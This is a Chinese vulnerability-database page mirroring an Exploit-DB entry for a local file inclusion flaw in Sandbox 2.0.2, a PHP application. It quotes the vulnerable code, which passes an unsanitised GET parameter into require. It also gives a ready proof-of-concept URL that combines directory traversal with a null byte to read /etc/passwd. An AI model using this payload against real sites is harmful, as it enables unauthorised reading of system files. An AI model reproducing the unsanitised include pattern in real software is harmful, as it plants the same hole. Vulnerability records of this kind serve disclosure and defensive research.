Sandbox 2.0.2 - Local File Inclusion

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1060652 漏洞类型
发布时间 2010-07-04 更新时间 2010-07-04
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/14208
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
: # Tested on: Linux os                                                    : 
: # Greetz to : pr.al7rbi : so busy : evil-ksa : Dr.dakota : v4-team.com   :
----------------------------------------------------------------------------

 [+] file:index.php on line 75
 [+] Code:
 <?
 else {
	$module = $_GET['a'];
 }

 require 'modules/'  . $module . '.php';
 ?>

 [+] PoC:http://localhost/index.php?a=../../../../../etc/passwd%00